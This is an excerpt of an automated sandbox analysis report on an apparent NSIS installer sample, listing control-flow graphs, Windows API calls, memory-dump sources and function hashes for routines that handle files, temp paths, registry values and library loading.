                                                                                                                control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 656 4017f7-4017f8 call 405eb9 655->656 657 4017fd-401819 call 405ede 655->657 656->657 665 40181b-40181e 657->665 666 40188d-4018b6 call 405450 call 4031d6 657->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 700 401864-401865 667->700 678 401882-401888 668->678 683 402ace 678->683 680->681 682 4018d0-4018db CloseHandle 680->682 681->682 685 4018e1-4018e4 682->685 686 402ac5-402ac8 682->686 687 402ad0-402ad4 683->687 689 4018e6-4018f7 call 40640a lstrcatW 685->689 690 4018f9-4018fc call 40640a 685->690 686->683 696 401901-4022fc call 405a4e 689->696 690->696 696->687 700->678 702 401867-401868 700->702 702->668
                                                                                                                APIs
                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,Call,00436000,?,?,00000031), ref: 004017B0
                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                  • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                  • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                                  • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                  • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp$C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll$Call
                                                                                                                • API String ID: 1941528284-2515661891
                                                                                                                • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                                • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                                • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 712 4027dc-4027e4 711->712 713 40267e-40268d call 406348 711->713 712->707 713->712 717 402693 713->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 722 402737-40273a 719->722 723 40274d-40275d call 405f61 719->723 720->712 721 4026c4-4026c9 720->721 721->712 726 4026cf-4026dd 721->726 722->723 724 40273c-402747 call 405fbf 722->724 723->712 732 40275f 723->732 724->712 724->723 729 4026e3-4026f5 MultiByteToWideChar 726->729 730 402798-4027a4 call 40632f 726->730 729->732 733 4026f7-4026fa 729->733 730->709 735 402762-402765 732->735 736 4026fc-402707 733->736 735->730 738 402767-40276c 735->738 736->735 739 402709-40272e SetFilePointer MultiByteToWideChar 736->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->736 742 402730 739->742 743 4027ca-4027d6 SetFilePointer 740->743 744 4027af-4027b3 740->744 741->740 745 402775-402788 741->745 742->732 743->712 746 4027b5-4027b9 744->746 747 4027bb-4027c8 744->747 745->712 748 40278a-402790 745->748 746->743 746->747 747->712 748->718 749 402796 748->749 749->712
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 004026F1
                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 00402714
                                                                                                                • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 0040272A
                                                                                                                  • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                • String ID: 9
                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                                • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                                • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                • wsprintfW.USER32 ref: 004067A4
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll$UXTHEME$\
                                                                                                                • API String ID: 2200240437-1946221925
                                                                                                                • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                                • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                                • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 757 73961777-739617b6 call 73961b5f 761 739618d6-739618d8 757->761 762 739617bc-739617c0 757->762 763 739617c2-739617c8 call 73962352 762->763 764 739617c9-739617d6 call 73962394 762->764 763->764 769 73961806-7396180d 764->769 770 739617d8-739617dd 764->770 771 7396180f-7396182b call 73962569 call 739615b4 call 73961272 GlobalFree 769->771 772 7396182d-73961831 769->772 773 739617df-739617e0 770->773 774 739617f8-739617fb 770->774 797 73961885-73961889 771->797 775 73961833-7396187c call 739615c6 call 73962569 772->775 776 7396187e-73961884 call 73962569 772->776 779 739617e2-739617e3 773->779 780 739617e8-739617e9 call 73962aac 773->780 774->769 777 739617fd-739617fe call 73962d37 774->777 775->797 776->797 791 73961803 777->791 785 739617e5-739617e6 779->785 786 739617f0-739617f6 call 73962724 779->786 788 739617ee 780->788 785->769 785->780 796 73961805 786->796 788->791 791->796 796->769 800 739618c6-739618cd 797->800 801 7396188b-73961899 call 7396252c 797->801 800->761 804 739618cf-739618d0 GlobalFree 800->804 807 739618b1-739618b8 801->807 808 7396189b-7396189e 801->808 804->761 807->800 809 739618ba-739618c5 call 7396153d 807->809 808->807 810 739618a0-739618a8 808->810 809->800 810->807 811 739618aa-739618ab FreeLibrary 810->811 811->807
                                                                                                                APIs
                                                                                                                  • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB2
                                                                                                                  • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB7
                                                                                                                  • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DBC
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 73961825
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 739618AB
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 739618D0
                                                                                                                  • Part of subcall function 73962352: GlobalAlloc.KERNEL32(?,?), ref: 73962383
                                                                                                                  • Part of subcall function 73962724: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,739617F6,00000000), ref: 739627F4
                                                                                                                  • Part of subcall function 739615C6: wsprintfW.USER32 ref: 739615F4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                • Opcode ID: f4e86d18154c8d65e23563610bd1b2a0a567e5a3fb53f3dcb12fab2c2d8e0849
                                                                                                                • Instruction ID: 82ba49fe69d4bfe28995f96736068f3b789bbe48da7b5881affc6107553d4947
                                                                                                                • Opcode Fuzzy Hash: f4e86d18154c8d65e23563610bd1b2a0a567e5a3fb53f3dcb12fab2c2d8e0849
                                                                                                                • Instruction Fuzzy Hash: E241BEB2402348EBEB119F749994B9637BCBF04395F185079E94B9E1C6DBB8C084C7A3

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 814 4032de-403306 GetTickCount 815 403436-40343e call 402e8e 814->815 816 40330c-403337 call 40345d SetFilePointer 814->816 821 403440-403444 815->821 822 40333c-40334e 816->822 823 403350 822->823 824 403352-403360 call 403447 822->824 823->824 827 403366-403372 824->827 828 403428-40342b 824->828 829 403378-40337e 827->829 828->821 830 403380-403386 829->830 831 4033a9-4033c5 call 406943 829->831 830->831 833 403388-4033a8 call 402e8e 830->833 836 403431 831->836 837 4033c7-4033cf 831->837 833->831 841 403433-403434 836->841 839 4033d1-4033d9 call 405f90 837->839 840 4033f2-4033f8 837->840 844 4033de-4033e0 839->844 840->836 843 4033fa-4033fc 840->843 841->821 843->836 845 4033fe-403411 843->845 846 4033e2-4033ee 844->846 847 40342d-40342f 844->847 845->822 848 403417-403426 SetFilePointer 845->848 846->829 849 4033f0 846->849 847->841 848->815 849->845
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 004032F2
                                                                                                                  • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
                                                                                                                • SetFilePointer.KERNELBASE(001663EE,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer$CountTick
                                                                                                                • String ID: 41A
                                                                                                                • API String ID: 1092082344-463856362
                                                                                                                • Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                • Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
                                                                                                                • Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
                                                                                                                • Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 850 4023e4-402415 call 402c41 * 2 call 402cd1 857 402ac5-402ad4 850->857 858 40241b-402425 850->858 859 402427-402434 call 402c41 lstrlenW 858->859 860 402438-40243b 858->860 859->860 863 40243d-40244e call 402c1f 860->863 864 40244f-402452 860->864 863->864 868 402463-402477 RegSetValueExW 864->868 869 402454-40245e call 4031d6 864->869 872 402479 868->872 873 40247c-40255d RegCloseKey 868->873 869->868 872->873 873->857 875 40288b-402892 873->875 875->857
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                                • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseValuelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp
                                                                                                                • API String ID: 2655323295-4198387027
                                                                                                                • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                                • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                                • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 876 405f0d-405f19 877 405f1a-405f4e GetTickCount GetTempFileNameW 876->877 878 405f50-405f52 877->878 879 405f5d-405f5f 877->879 878->877 881 405f54 878->881 880 405f57-405f5a 879->880 881->880
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF), ref: 00405F46
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                • API String ID: 1716503409-1331003597
                                                                                                                • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 882 402d44-402d6d call 406255 884 402d72-402d74 882->884 885 402d76-402d7c 884->885 886 402dec-402df0 884->886 887 402d98-402dad RegEnumKeyW 885->887 888 402d7e-402d80 887->888 889 402daf-402dc1 RegCloseKey call 4067c2 887->889 891 402dd0-402dde RegCloseKey 888->891 892 402d82-402d96 call 402d44 888->892 895 402de0-402de6 RegDeleteKeyW 889->895 896 402dc3-402dce 889->896 891->886 892->887 892->889 895->886 896->886
                                                                                                                APIs
                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$Enum
                                                                                                                • String ID:
                                                                                                                • API String ID: 464197530-0
                                                                                                                • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                                • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                                • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                                • GetLastError.KERNEL32 ref: 00405976
                                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                                • GetLastError.KERNEL32 ref: 00405995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                • String ID:
                                                                                                                • API String ID: 3449924974-0
                                                                                                                • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                                • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                                • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                  • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
